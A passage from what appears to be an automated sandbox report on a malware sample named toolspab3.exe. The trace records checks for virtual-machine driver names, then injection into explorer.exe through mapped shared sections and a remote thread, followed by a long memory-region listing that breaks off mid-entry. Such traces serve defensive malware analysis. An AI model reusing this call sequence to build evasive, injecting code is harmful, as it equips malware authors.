(_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0070.652] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0070.654] LocalFree (hMem=0x2149d0) returned 0x0 [0070.654] Sleep (dwMilliseconds=0x1388) [0075.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x310000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0075.656] GetShellWindow () returned 0x100e6 [0075.656] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0075.657] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0075.657] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0075.657] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0075.658] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x320000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0075.658] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x27a0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0083.469] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x320000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe")) returned 0x28 [0083.470] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0083.470] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x3c0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0083.470] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x3940000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0083.473] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x3941930, Parameter=0x27a0000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0083.476] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x8651000" os_pid = "0x390" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 379 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 380 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 381 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 382 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 383 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 384 start_va = 0xc0000 end_va = 0xc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 385 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 386 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 387 start_va = 0xf0000 end_va = 0xfcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 388 start_va = 0x100000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 389 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 390 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 391 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 392 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 393 start_va = 0x2e0000 end_va = 0x3befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 394 start_va = 0x3c0000 end_va = 0x3c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 395 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 396 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 397 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 398 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 399 start_va = 0x800000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 400 start_va = 0x1c00000 end_va = 0x1c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 401 start_va = 0x1c10000 end_va = 0x1c29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 402 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 403 start_va = 0x1c40000 end_va = 0x1c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 404 start_va = 0x1c50000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 405 start_va = 0x1c70000 end_va = 0x1c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 406 start_va = 0x1c80000 end_va = 0x1c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 407 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 408 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 409 start_va = 0x1cb0000 end_va = 0x1cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 410 start_va = 0x1cc0000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 411 start_va = 0x1d40000 end_va = 0x1d41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 412 start_va = 0x1d50000 end_va = 0x1d52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 413 start_va = 0x1d60000 end_va = 0x1d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 414 start_va = 0x1d70000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 415 start_va = 0x1df0000 end_va = 0x20befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 416 start_va = 0x20c0000 end_va = 0x211bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 417 start_va = 0x2120000 end_va = 0x2125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 418 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 419 start_va = 0x2140000 end_va = 0x2148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 420 start_va = 0x2150000 end_va = 0x2157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 421 start_va = 0x2160000 end_va = 0x2176fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 422 start_va = 0x2180000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 423 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 424 start_va = 0x21a0000 end_va = 0x21a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 425 start_va = 0x21b0000 end_va = 0x21b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 426 start_va = 0x21c0000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 427 start_va = 0x2220000 end_va = 0x229dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 428 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 429 start_va = 0x23a0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 430 start_va = 0x23d0000 end_va = 0x23d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 431 start_va = 0x23e0000 end_va = 0x23e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 432 start_va = 0x23f0000 end_va = 0x23f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 433 start_va = 0x2400000 end_va = 0x2400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 434 start_va = 0x2410000 end_va = 0x2410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 435 start_va = 0x2420000 end_va = 0x2421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002420000" filename = "" Region: id = 436 start_va = 0x2430000 end_va = 0x2433fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 437 start_va = 0x2440000 end_va = 0x2440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 438 start_va = 0x2450000 end_va = 0x2450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 439 start_va = 0x2460000 end_va = 0x2460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 440 start_va = 0x2470000 end_va = 0x247efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 441 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 442 start_va = 0x2580000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 443 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 444 start_va = 0x2780000 end_va = 0x2781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 445 start_va = 0x2790000 end_va = 0x2791fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 446 start_va = 0x27a0000 end_va = 0x27a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 447 start_va = 0x27b0000 end_va = 0x27b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 448 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 449 start_va = 0x27d0000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 450 start_va = 0x2850000 end_va = 0x2850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 451 start_va = 0x2860000 end_va = 0x2860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 452 start_va = 0x2870000 end_va = 0x2870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 453 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 454 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 455 start_va = 0x2910000 end_va = 0x2911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002910000" filename = "" Region: id = 456 start_va = 0x2920000 end_va = 0x2920fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 457 start_va = 0x2930000 end_va = 0x2934fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 458 start_va = 0x2940000 end_va = 0x2970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 459 start_va = 0x2980000 end_va = 0x2983fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 460 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 461 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 462 start_va = 0x29b0000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 463 start_va = 0x29c0000 end_va = 0x29c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 464 start_va = 0x29d0000 end_va = 0x29d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 465 start_va = 0x29e0000 end_va = 0x29edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 466 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 467 start_va = 0x2a70000 end_va = 0x2ad5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 468 start_va = 0x2ae0000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 469 start_va = 0x2af0000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 470 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 471 start_va = 0x2b80000 end_va = 0x2b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 472 start_va = 0x2b90000 end_va = 0x2b93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 473 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 474 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 475 start_va = 0x2bc0000 end_va = 0x2bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 476 start_va = 0x2bd0000 end_va = 0x2bd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 477 start_va = 0x2be0000 end_va = 0x2be3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 478 start_va = 0x2bf0000 end_va = 0x2bf0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 479 start_va = 0x2c00000 end_va = 0x2c03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 480 start_va = 0x2c10000 end_va = 0x2c10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 481 start_va = 0x2c20000 end_va = 0x2c23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 482 start_va = 0x2c30000 end_va = 0x2c30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 483 start_va = 0x2c40000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 484 start_va = 0x2cc0000 end_va = 0x35effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 485 start_va = 0x35f0000 end_va = 0x35f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 486 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 487 start_va = 0x3610000 end_va = 0x3613fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 488 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 489 start_va = 0x3630000 end_va = 0x36affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 490 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 491 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 492 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 493 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 494 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 495 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 496 start_va = 0x3710000 end_va = 0x3710fff monitored = 1 entry_point = 